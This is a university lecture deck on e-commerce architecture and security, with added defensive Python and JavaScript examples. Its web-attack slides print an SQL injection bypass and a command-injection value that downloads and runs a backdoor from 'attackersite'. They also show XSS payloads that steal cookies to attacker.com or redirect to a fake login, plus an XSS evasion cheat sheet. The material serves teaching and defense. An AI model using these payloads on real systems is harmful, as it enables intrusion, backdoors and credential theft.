EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.
ITEC5611, S. Kungpisdan
Outline
• EC Architectural Framework
• EC Security
– Basic Security Issues
– Security Incidences
– Attacking Web Applications
– Access Controls
– Securing EC Communications
– Securing EC Networks
– Operations Security
– Law, Investigation, and Ethics
EC Framework
(Layered diagram on the original slide; the layers and the examples given for them:)
• E-commerce Applications: catalog based retail, marketing & advertising, banking & investments, supply chain management, auctions, home shopping, procurements
• Secure Payment Protocols / Online Payment Infrastructure
• Security and Encryption Technology
• Business Service Infrastructure: directories, search engines, etc.
• Networked Multimedia Content Publishing Technologies: HTML, XML, Java, graphics, video tools, etc.
• Information Distribution & Messaging Technologies: HTTP, SMTP, etc.
• Network Protocol Standards / Network Infrastructure (Internet)
• Legal and Public Policy Framework
• Public Key, Identification and Authentication Infrastructure
Network Infrastructure
• The Internet Superhighway is responsible for seamless, reliable transportation of information among host devices.
• Local Area Networks, IEEE 802.3 Standards and Ethernet
• Wide Area Networks
• The Seamless Interface is offered through
– Internet and TCP/IP Model
– IP Addressing and Domain Naming System
– Internet Industry Structure
Information Distribution Technologies
• Standard Protocols for Information Distribution on the Internet
– File Transfer Protocol (FTP)
– Simple Mail Transfer Protocol (SMTP)
– Hyper Text Transfer Protocol (HTTP)
– Web Server Implementations
• Apache Web Server
• Microsoft’s IIS
Multimedia Publishing Technologies
• Information Publishing and Web Browsers
– Hyper Text Markup Language (HTML)
– Forms and Common Gateway Interface
– Active Server Pages (ASP)
– Dynamic HTML
– HTML Editors
– XML
• Multimedia Content
– Graphics and Image Formats
– Web Image Formats
– Other Multimedia Objects
• VRML (Virtual Reality Markup Language)
Security and Encryption
• Importance of security for Electronic Commerce and inherent vulnerability of the Internet
• Protecting the Web (HTTP) Service
• The Issues in Transaction Security
– Cryptography and Cryptanalysis
– Symmetric Key Cryptographic Algorithms
– Public-Key Algorithms
– Authentication Protocols
– Integrity and Non-repudiation
• Digital Certificates and Signatures
• Electronic Mail Security
– PGP, S/MIME
• Security Protocols for E-commerce
– SSL, TLS
Payment Services
• Payment Systems
• Characteristics of Online Payment Systems
– Pre-Paid Electronic Payment Systems
– Instant-Paid Electronic Payment Systems
– Post-Paid Electronic Payment Systems
• Some Electronic Payment Systems
– Secure Electronic Transaction (SET) for Credit Cards
– E-cash
– NetCheque
Business Service Infrastructure
• Searching and Locating Information on Web Space
• Information Directories
• Search Engines
• Improving the Search Results
• Internet Advertising
Public Policy and Legal Infrastructure
• Universal Access to Network Infrastructure
• Model Law for Electronic Commerce
• Taxation Issues in Electronic Commerce
• Need for Public Key Infrastructure (PKI)
• Digital Certificates and Digital Signatures
Basic Security Issues
• From the user’s perspective:
– Is the Web server owned and operated by a legitimate company?
– Does the Web page or form contain any malicious or dangerous code or content?
– Will the owner of the Web site distribute the information the user provides to some other party?
Basic Security Issues (cont.)
• From the company’s perspective:
– How does the company know the user will not attempt to break into the Web server or alter the pages and content at the site?
– How does the company know that the user will not try to disrupt the server so that it is not available to others?
Basic Security Issues (cont.)
• From both parties’ perspectives:
– How do both parties know that the network connection is free from eavesdropping by a third party “listening” on the line?
– How do they know that the information sent back and forth between the server and the user’s browser has not been altered?
Goals of Computer Security (CIA)
• Confidentiality
– Ensure that the message is accessible only by authorized parties
• Integrity
– Ensure that the message is not altered during transmission
• Availability
– Ensure that the information on the system is available to authorized parties at appropriate times
Basic Security Issues
• Authentication
• Authorization
• Auditing
• Confidentiality (Privacy)
• Integrity
• Availability
• Non-repudiation
Security Trends
Vulnerabilities, Threats, and Attacks
• Vulnerability
– A weakness in the security system
– E.g. a program flaw, poor security configuration, bad password policy
• Threat
– A set of circumstances or people that potentially causes loss or harm to a system
• Attack
– An action or series of actions to harm a system
Relationships among different Security Components
Relationship of Threats and Vulnerabilities
How Hackers Exploit Weaknesses
General Security Issues at EC Sites
Types of Security Incidences
Hackers
• White Hat Hackers
• Grey Hat Hackers
• Script Kiddies
• Hacktivists
• Crackers or Black Hat Hackers
Hackers’ Steps
1. Gather information: telephone conversation, password crackers
2. Gain initial system access: often limited access and rights
3. Increase privileges and expand access: try to get root privilege
4. Carry out purpose of the attack: steal or destroy information
5. Install backdoors: build an entrance for the next visit
6. Cover tracks and exit: remove all traces, usually by modifying log files
Malicious Codes
• Viruses
– A destructive program code that attaches itself to a host, copies itself and spreads to other hosts
– A virus replicates and remains undetected until it is activated.
• Worms
– Unlike viruses, worms are independent of other programs or files. No trigger is needed.
• Trojans
– An externally harmless program that contains malicious code
• Spyware
– Software installed on a target machine that sends information back to an owning server
Security Incidences
• Probe
– A probe is characterized by unusual attempts to gain access to a system or to discover information about the system.
– Sometimes followed by a more serious security event, but probes are often the result of curiosity or confusion.
• Scan
– A large number of probes done using an automated tool.
– Often a prelude to a more directed attack on systems whose security can be breached.
• Account Compromise
– Unauthorized use of a computer account by someone other than the account owner, without involving system-level or root-level privileges. It might expose the victim to serious data loss, data theft, or theft of services.
– The lack of root-level access means that the damage can usually be contained, but a user-level account opens up avenues for greater access to the system.
Security Incidences (cont’d)
• Root Compromise
– Similar to an account compromise, except that the account that has been compromised has special privileges on the system.
• Packet Sniffer
– A program that captures data from information packets as they travel over the network.
Security Incidences (cont’d)
• Denial-of-service (DoS) attack
– An attack on a Web site in which an attacker uses specialized software to send a flood of data packets to the target computer with the aim of overloading its resources
• Distributed denial-of-service (DDoS) attack
– A denial-of-service attack in which the attacker gains illegal administrative access to as many computers on the Internet as possible and uses the multiple computers to send a flood of data packets to the target computer
Using Zombies in a Distributed DoS Attack
Attacking Web Applications
• The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data
• This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server
SQL Injection
• Many web applications rely on backend DBs for information storage and retrieval.
• Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters.
• Consider the following PHP query, built by interpolating the form values into the SQL text:
$query = "SELECT * FROM users WHERE username = '{$_POST['user']}' AND password = '{$_POST['pass']}'";
• With a crafted password the query becomes:
SELECT * FROM users WHERE username = 'bob' AND password = '' OR 1=1
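The same login query built both ways in Python against an in-memory SQLite table, as an added example (not the lecture's code; the table, the accounts and the crafted password ' OR '1'='1 are constructed here). The first function reproduces the slide's string interpolation and is bypassed by the always-true condition; the second binds the values as parameters, so the quote stays data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample table; the accounts are invented for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("bob", "s3cret"), ("alice", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    # Same construction as the slide's PHP: the form values are interpolated
    # into the SQL text, so a quote in the input ends the string literal and
    # whatever follows is parsed as SQL.
    query = f"SELECT * FROM users WHERE username = '{user}' AND password = '{pw}'"
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    # Parameterized query: the SQL text is fixed and the values travel
    # separately, so the same input is compared as a literal password.
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (user, pw)).fetchone() is not None


# The slide's always-true trick in a form that stays syntactically valid:
# the template turns it into  password = '' OR '1'='1'
CRAFTED_PASSWORD = "' OR '1'='1"


def demo() -> dict:
    # Run both variants with the crafted password against the same table.
    conn = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, "bob", CRAFTED_PASSWORD),
        "safe_bypassed": login_safe(conn, "bob", CRAFTED_PASSWORD),
    }
```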
Code Injection
• Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments
• Consider a PHP script that takes a string supplied from a web page form and passes it to the nslookup utility
Code Injection (cont.)
• If the user supplies ;ls -la /, the script will execute the command nslookup ;ls -la /, resulting in a listing of the root directory being printed out
Code Injection (cont.)
• wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script
• ;wget http://attackersite/backdoor.pl;perl backdoor.pl
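A hardened counterpart to the slide's nslookup script, written in Python as an added example (not the lecture's code; the hostname pattern and the function names are my choices). The input is allowlist-validated and then passed as one argv element rather than pasted into a shell command line, so a value such as ;ls -la / is rejected before any process starts.

```python
import re
import subprocess
from typing import List

# Hostname allowlist (RFC 1123 shape): dot-separated labels of letters, digits
# and inner hyphens. Shell metacharacters such as ; | & ` $ never match.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def shell_command_vulnerable(host: str) -> str:
    # What the slide's PHP script hands to the shell: the form value is glued
    # onto the command line, so a ';' in it starts a second command.
    return "nslookup " + host


def is_valid_hostname(host: str) -> bool:
    return HOSTNAME_RE.match(host) is not None


def lookup_argv(host: str) -> List[str]:
    # Hardened form, step 1: reject anything that is not a plain hostname.
    if not is_valid_hostname(host):
        raise ValueError(f"rejected lookup target: {host!r}")
    return ["nslookup", host]


def lookup(host: str) -> str:
    # Step 2: run with an argv list and no shell, so even a value that slipped
    # past the validator would reach nslookup as one literal argument.
    result = subprocess.run(lookup_argv(host), capture_output=True, text=True, timeout=10)
    return result.stdout
```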
Cross-Site Scripting (XSS)
• XSS vulnerabilities allow attackers to inject code or HTML into a web page that will be executed when a different user visits that page
• These attacks target visitors to a web site, not the site itself, and occur when a web page does not properly sanitize user input before using it in output
• In a vulnerable website it is possible to execute HTML and JavaScript supplied through an unsanitized form; combined, the two can be really dangerous: it is possible to steal cookies or to redirect web pages to a fake login in order to steal usernames and passwords.
Types of XSS
• The term XSS is actually a bit elusive because it covers different kinds of attacks that rely on different attacking mechanisms.
• There are actually three types of Cross-Site Scripting, commonly named:
– DOM-Based XSS
– Non-persistent XSS
– Persistent XSS
Ref: http://www.milw0rm.com/papers/146 and http://en.wikipedia.org/wiki/Cross_Site_Scripting
DOM-based XSS
• DOM-based or Type 0 XSS, also referred to as local XSS, is based on the standard object model for representing HTML or XML documents, the Document Object Model (DOM for short).
• DOM-based XSS allows an attacker to act not on a victim website but on the victim’s local machine
DOM-based XSS (cont.)
1. The attacker creates a well-built malicious website
2. The unsuspecting user opens that site
3. The user has a vulnerable page on his machine
4. The attacker’s website sends commands to the vulnerable HTML page
5. The vulnerable local page executes those commands with the user’s privileges on that machine
6. The attacker easily gains control of the victim computer.
Exploit Scenario
1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
2. Alice clicks on the link.
3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.
4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.
5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.
DOM-based XSS (cont.)
• DOM-based XSS is really dangerous because it operates directly on the victim’s system, and as long as the user does not look after his/her own security and does not apply updates, the DOM-based XSS keeps working.
• Solution: to prevent this kind of attack there are only two things to take care of:
– Do not visit untrusted websites
– Keep your system up to date
Non-persistent XSS
• The non-persistent or Type 1 XSS is also referred to as a reflected vulnerability, and is by far the most common type.
• It is commonly called "non-persistent" because it works on an immediate HTTP response from the victim website
• It shows up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user.
• If unvalidated user-supplied data is included in the resulting page without HTML encoding, client-side code can be injected into the dynamic page
Non-persistent XSS: Search Engine
• The attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will render that HTML.
• If this happens, in 99% of cases the search engine will also execute arbitrary JavaScript code.
Example
1. Suppose a website’s search works like this: http://www.example.com/search.php?text=TEXTTOSEARCH
2. Try to include some HTML tags in the "text" variable: http://www.example.com/search.php?text=<img src="http://attacker.com/image.jpg">
If the website is vulnerable it will display the attacker’s image in the result webpage.
Example (cont.)
3. Then try to write some JavaScript code: http://www.example.com/search.php?text=<script>alert(document.cookie)</script>
Probably the website will return an alert popup with the current cookie for the site itself.
Example (cont.)
• This vulnerability can be used by the attacker to steal information from users of the victim website, for example by sending them an email with a URL like: http://www.victim.com/search.php?text=MALICIOUSCODE
• To make that URL less suspicious it is useful to encode the code as URL hex values. For example the code <script>alert("XSS")</script> encoded will look like: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Example (cont.)
• So the malicious URL turns from:
http://www.victim.com/search.php?text=<script>alert("XSS")</script>
into:
http://www.victim.com/search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
which, to a clueless user, looks a lot less suspicious than the first one.
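Hex encoding hides the payload from a human reader, not from a decoder. The following added Python example (not from the lecture; the access-log lines are constructed, the second carrying the slide's encoded script payload) percent-decodes query parameters until they stop changing, so it also catches double encoding such as %253C, and flags tag, script-URL and event-handler markup in search terms for review.

```python
import re
from typing import Dict, List
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the lecture). The second request
# carries the slide's hex-encoded <script>alert("XSS");</script>; the third
# is double-encoded (%253C is "%3C" encoded once more) with a second parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?text=shoes HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?text=%253Cscript%253E&page=2 HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# Markup that has no business in a search term: tags, script URLs, event handlers.
SUSPICIOUS_RE = re.compile(
    r"<\s*/?\s*(script|img|iframe|body|svg|style|object|embed)\b"
    r"|javascript\s*:|vbscript\s*:|\bon[a-z]+\s*=",
    re.IGNORECASE,
)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    # Percent-decode until the string stops changing, so %253C -> %3C -> <.
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str) -> List[Dict[str, str]]:
    # Pull the request target out of one combined-format log line and
    # inspect every query parameter after full decoding.
    m = REQUEST_RE.search(line)
    if not m:
        return []
    client = line.split(" ", 1)[0]
    findings = []
    for pair in urlsplit(m.group("target")).query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        decoded = fully_decode(raw)
        if SUSPICIOUS_RE.search(decoded):
            findings.append({"client": client, "param": fully_decode(name), "decoded": decoded})
    return findings


def scan_log(text: str) -> List[Dict[str, str]]:
    return [f for line in text.splitlines() for f in scan_line(line)]
```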
Example (cont.)
1. The attacker realizes that the victim website is vulnerable to XSS
2. The attacker creates on his website an ad-hoc page which is used to steal sensitive information, e.g. cookies, or to present a fake login for the victim website.
3. The attacker provides a user with a crafted URL containing malicious code like:
http://www.victim.com/search.php?text=<script>document.location("http://attackersite.com/fakelogin.php")</script>
encoded in hex.
4. The user visits the web page and is silently redirected to the attacker’s fake login
5. The user is invited to log into the system and does so.
6. The fake login steals the username and password of the victim.
Exploit Scenario
1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information.
2. Mallory observes that Bob's website contains a reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, making it look as if it came from Bob (i.e., the email is spoofed).
4. Alice visits the URL provided by Mallory while logged into Bob's website.
Exploit Scenario (cont.)
5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server. The script can be used to email Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge.
Interesting Example
• http://www.yannarak.net/node/2
Persistent XSS
• Persistent XSS is similar to non-persistent XSS
– Both work on a victim site and try to steal user information
• However, the attacker does not need to provide the crafted URL to the users
• Because the website itself permits users to insert persistent data into the system
– This is the case, for example, of "guestbooks"
• Usually users use that kind of tool to leave messages to the owner of the website
• An attacker can insert some malicious code in his message and make ALL visitors victims of it.
Exploit Scenario
1. Bob hosts a web site allowing users to post messages and other content to the site for later viewing by other members.
2. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack.
3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it.
4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's web server without their knowledge.
5. Later, Mallory logs in as other site users and posts messages on their behalf....
Exploit Scenario (cont.)
• This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided from the user into the result page.
• The attacker could easily insert as much code as he wants into the tool, for example:
<img src="javascript:document.location ('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));">
This allows the attacker to steal the cookie of the victim user.
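The guestbook from the slide in its vulnerable and hardened forms, as an added Python example (not the lecture's code; the entries are constructed and the function names are mine). User text is HTML-escaped on output, and links are allowlisted to http(s) schemes, because escaping alone leaves a javascript: URL in an href fully functional.

```python
import html
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Constructed guestbook entries (sample data, not from the lecture). The second
# message is the slide's cookie-stealing <img> payload; the third puts a
# javascript: URL in the link field, which escaping alone does not defuse.
ENTRIES: List[Dict[str, str]] = [
    {"name": "alice", "homepage": "https://alice.example/", "message": "Nice site!"},
    {"name": "mallory", "homepage": "https://mallory.example/",
     "message": "<img src=\"javascript:document.location('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));\">"},
    {"name": "mallory", "homepage": "javascript:alert(document.cookie)", "message": "click my name"},
]


def render_unsafe(entries: List[Dict[str, str]]) -> str:
    # The guestbook as the slide describes it: no check on the content,
    # the stored data is pasted straight into the result page.
    return "\n".join(
        f'<p><a href="{e["homepage"]}">{e["name"]}</a>: {e["message"]}</p>' for e in entries
    )


def safe_href(url: str) -> Optional[str]:
    # URL context needs a scheme allowlist, not escaping: html.escape leaves
    # "javascript:alert(1)" untouched, and the browser would still run it.
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return url
    return None


def render_safe(entries: List[Dict[str, str]]) -> str:
    out = []
    for e in entries:
        # Text context: < > & " ' become entities, so stored markup is shown, not parsed.
        name = html.escape(e["name"], quote=True)
        message = html.escape(e["message"], quote=True)
        href = safe_href(e["homepage"])
        if href is None:
            out.append(f"<p>{name}: {message}</p>")  # unusable link: render the name only
        else:
            out.append(f'<p><a href="{html.escape(href, quote=True)}">{name}</a>: {message}</p>')
    return "\n".join(out)
```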
More about XSS
• In order to make the attack less suspicious it is possible to "obfuscate" the IP address of the attacker’s website, encoding the IP address in one of three formats:
– Dword address
– Hex address
– Octal address
• For example the IP address 127.0.0.1 will look like:
– Dword: 2130706433
– Hex: 0x7f.0x00.0x00.0x01
– Octal: 0177.0000.0000.0001
• Try for example http://0x7f.0x00.0x00.0x01/ and it will open your localhost web server.
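For log review and URL filtering a defender needs to map these obfuscated forms back to dotted-quad notation. This added Python example (not from the lecture; the function names are mine) applies the per-component rules that the classic inet_aton() uses, and it also handles the one-, two- and three-part forms those rules allow, which go beyond the slide's three examples.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# One dotted component: hex (0x..), octal (leading 0) or decimal, as inet_aton() reads it.
_COMPONENT_RE = re.compile(r"0[xX][0-9A-Fa-f]+|[0-9]+")


def _parse_component(text: str) -> int:
    if not _COMPONENT_RE.fullmatch(text):
        raise ValueError(text)
    if text[:2].lower() == "0x":
        return int(text[2:], 16)   # hex, e.g. 0x7f
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)        # octal, e.g. 0177
    return int(text, 10)           # decimal


def normalize_ip_host(host: str) -> Optional[str]:
    """Return the dotted-quad form of an IPv4 host written in any inet_aton()
    notation, or None if the string is not such an address (e.g. a DNS name)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or "" in parts:
        return None
    try:
        nums = [_parse_component(p) for p in parts]
    except ValueError:
        return None
    tail_bits = 8 * (5 - len(parts))  # the last component fills all remaining bytes
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= (1 << tail_bits):
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << tail_bits) | nums[-1]
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def url_host_to_dotted(url: str) -> Optional[str]:
    # Convenience for log review: pull the host out of a URL and normalize it.
    host = urlsplit(url).hostname
    return normalize_ip_host(host) if host else None
```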
Possible XSS Cheats
• <IMG SRC="javascript:alert('XSS');">
• <IMG SRC=javascript:alert('XSS')>
• <IMG SRC="javascript :alert('PLAYHACK.NET')">
• <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
• <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
• <<SCRIPT>alert("XSS");//<</SCRIPT>
• <iframe src=http://example.com/scriptlet.html <
• <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
• <BODY BACKGROUND="javascript:alert('XSS')">
• <BODY ONLOAD=alert(document.cookie)>
• <IMG DYNSRC="javascript:alert('XSS')">
Possible XSS Cheats (cont.)
• <IMG DYNSRC="javascript:alert('XSS')">
• <BR SIZE="&{alert('XSS')}">
• <IMG SRC='vbscript:msgbox("XSS")'>
• <TABLE BACKGROUND="javascript:alert('XSS')">
• <DIV STYLE="width: expression(alert('XSS'));">
• <DIV STYLE="background-image: url(javascript:alert('XSS'))">
• <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
• <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
• <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
• <A HREF="javascript:document.location='http://www.example.com/'">XSS</A>
Information Disclosure
• An error page can disclose the path of the web server's root directory
• The path disclosure can aid attackers performing reconnaissance on the site
• phpinfo.php, part of a default PHP install, is a script providing the OS and software version on the host and other related information
• Google for inurl:phpinfo.php to see exactly how much information is leaked
Outline

• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics
CIA for Access Control
• Confidentiality
  – Not disclosed to unauthorized persons
• Integrity
  – Prevention of modification by unauthorized users
  – Prevention of unauthorized changes by otherwise authorized users
  – Internal and external consistency
  – Internal consistency within the system (e.g., within a database the sum of the subtotals equals the sum of all units)
  – External consistency between the database and the real world (e.g., the database total equals the actual inventory in the warehouse)
• Availability
  – Timely access
Security Controls
Ref: S. Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill
Security Controls (cont.)
Ref: S. Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill
Authentication
• Something you know
  – Passwords, PINs
• Something you have
  – Tokens, smart cards
• Something you are
  – Biometrics
Biometrics
• Biometric systems: authentication systems that identify a person by measurement of a biological characteristic, such as fingerprints, iris (eye) patterns, facial features, or voice
• Physiological biometrics: measurements derived directly from different parts of the body (e.g., fingerprint, iris, hand, facial characteristics)
• Behavioral biometrics: measurements derived from various actions and indirectly from various body parts (e.g., voice scans or keystroke monitoring)
Biometrics (cont.)
• Fingerprints
• Palm scans
• Hand geometry
• Retina scans
• Iris scans
• Facial scans
• Voice print
• Signature dynamics
• Keyboard dynamics
Single Sign-on
• Kerberos
• Allows a user to access many services from only one authentication
• Symmetric key encryption
  – KDC – Kerberos-trusted Key Distribution Center
  – AS – Authentication Server
  – TGS – Ticket Granting Service
Kerberos (cont.)
Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson-Prentice Hall
Intrusion Detection
• Network based
  – Real time, passive
  – Snort
• Host based
  – System and event logs
  – Limited by log capabilities
• Honey pot
• System Integrity Verifier (SIV)
  – Tripwire
Intrusion Detection (cont.)
• Signature based (knowledge based)
  – Signatures of an attack are stored and referenced
  – Fails to recognize slow attacks
  – Must have the signature stored to identify an attack
• Statistical anomaly based (behavior based)
  – IDS determines a "normal" usage profile using statistical samples
  – Detects anomalies from the normal profile
Measures for compensating for both internal and external access violations
• Backups
• RAID – Redundant Array of Inexpensive Disks
• Fault tolerance
• Business continuity planning
• Insurance
Outline

• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics
Transaction Security Issues
• Disclosure: release of message contents to any person not authorized to see them
• Traffic analysis: discovery of the pattern of traffic between parties
• Masquerade: insertion of messages into the network from a fraudulent source
• Content modification: changes to the contents of a message, including insertion, deletion, transposition, or modification
Transaction Security Issues (cont.)
• Sequence modification: insertion, deletion, or reordering of sequenced packets by the intruder during transmission
• Timing modification: delay or replay of old message sequences that were recorded by the intruder in an earlier transaction
• Repudiation: denial of receipt of a message by the destination, or denial of transmission of a message by the source
Encryption
The process of scrambling (encrypting) a message (plaintext) into ciphertext in such a way that it is difficult, expensive, or time-consuming for an unauthorized person to unscramble (decrypt) it
plaintext + encryption algorithm + key → ciphertext
Basic Terminology
• plaintext - original message
• ciphertext - coded message
• cipher - algorithm for transforming plaintext to ciphertext
• key - info used in the cipher, known only to sender/receiver
• encipher (encrypt) - converting plaintext to ciphertext
• decipher (decrypt) - recovering plaintext from ciphertext
• cryptography - study of encryption principles/methods
• cryptanalysis (codebreaking) - study of principles/methods of deciphering ciphertext without knowing the key
• cryptology - field of both cryptography and cryptanalysis
Cryptography and Steganography
• Plaintext can be hidden in two ways:
  – Steganography: conceal the existence of the message
  – Cryptography: render the message unintelligible to outsiders using various kinds of transformation of the text
• Examples of steganography
  – Character marking: overwrite selected letters with pencil
  – Invisible ink: use a special substance
  – Pin punctures: pin punctures on selected letters
How a Cryptosystem Works
Plaintext (M) (data file or messages)
  → encryption algorithm (E) + secret key A (KA)
Ciphertext (C) (stored or transmitted safely)
  → decryption algorithm (D) + secret key B (KB)
Plaintext (M) (original data or messages)

Note: Key A may be the same as Key B, depending on the algorithm

E(M) = C, D(C) = M, D(E(M)) = M
Brute Force Search
• always possible to simply try every key
• most basic attack, proportional to key size
• assume either know / recognise plaintext

| Key Size (bits) | Number of Alternative Keys | Time required at 1 decryption/µs | Time required at 10^6 decryptions/µs |
|---|---|---|---|
| 32 | 2^32 = 4.3 × 10^9 | 2^31 µs = 35.8 minutes | 2.15 milliseconds |
| 56 | 2^56 = 7.2 × 10^16 | 2^55 µs = 1142 years | 10.01 hours |
| 128 | 2^128 = 3.4 × 10^38 | 2^127 µs = 5.4 × 10^24 years | 5.4 × 10^18 years |
| 168 | 2^168 = 3.7 × 10^50 | 2^167 µs = 5.9 × 10^36 years | 5.9 × 10^30 years |
| 26 characters (permutation) | 26! = 4 × 10^26 | 2 × 10^26 µs = 6.4 × 10^12 years | 6.4 × 10^6 years |
Caesar Cipher
• earliest known substitution cipher
• by Julius Caesar
• first attested use in military affairs
• replaces each letter by the 3rd letter on
• example:
  meet me after the toga party
  PHHW PH DIWHU WKH WRJD SDUWB
Caesar Cipher

(Figure: cipher wheel with K=3; outer ring: plaintext, inner ring: ciphertext)
Cryptanalysis of Caesar Cipher
• only have 26 possible ciphers – A maps to A, B, .., Z
• could simply try each in turn
• a brute force search
• given ciphertext, just try all shifts of letters
• do need to recognize when have plaintext
• e.g. break ciphertext "GCUA VQ DTGCM"
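An added example (not from the lecture), in JavaScript: the Caesar cipher with the exhaustive 26-key search described above, plus a simple English-likeness score (letter frequencies with a bonus for common words) so the search recognises the plaintext by itself. It goes beyond the slide by handling any shift, not only K=3, and it solves the "GCUA VQ DTGCM" exercise.

```javascript
// Added example, not from the lecture: Caesar cipher plus brute-force
// cryptanalysis that recognises the plaintext automatically.

const ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';

// Relative frequency (%) of each letter in English text, A..Z.
const ENGLISH_FREQ = [8.2, 1.5, 2.8, 4.3, 12.7, 2.2, 2.0, 6.1, 7.0, 0.15, 0.77, 4.0, 2.4,
  6.7, 7.5, 1.9, 0.095, 6.0, 6.3, 9.1, 2.8, 0.98, 2.4, 0.15, 2.0, 0.074];

// A handful of very common English words; a hit earns extra credit.
const COMMON_WORDS = new Set(['THE', 'OF', 'AND', 'TO', 'IN', 'IS', 'YOU', 'THAT',
  'IT', 'HE', 'WAS', 'FOR', 'ON', 'ARE', 'AS', 'WITH', 'HIS', 'THEY', 'AT', 'BE',
  'THIS', 'HAVE', 'FROM', 'OR', 'ONE', 'HAD', 'BY', 'BUT', 'NOT', 'WHAT', 'ALL',
  'WERE', 'WE', 'WHEN', 'YOUR', 'CAN', 'THERE', 'AN', 'WHICH', 'DO', 'IF', 'WILL',
  'UP', 'ME', 'AFTER', 'SO', 'NO']);

// Shift every letter k positions forward (mod 26); output is upper case and
// non-letters pass through unchanged, matching the slide's example.
function caesarEncrypt(text, k) {
  const shift = ((k % 26) + 26) % 26;
  return text.toUpperCase().replace(/[A-Z]/g,
    (c) => ALPHABET[(ALPHABET.indexOf(c) + shift) % 26]);
}

// Decryption is encryption with the opposite shift.
function caesarDecrypt(text, k) {
  return caesarEncrypt(text, -k);
}

// Score how English a candidate plaintext looks: sum of letter frequencies,
// plus 10 points per letter of every token that is a common English word.
// Frequency alone usually suffices; the word bonus helps on short texts.
function englishScore(text) {
  let score = 0;
  for (const c of text) {
    const i = ALPHABET.indexOf(c);
    if (i >= 0) score += ENGLISH_FREQ[i];
  }
  for (const w of text.split(/[^A-Z]+/)) {
    if (COMMON_WORDS.has(w)) score += 10 * w.length;
  }
  return score;
}

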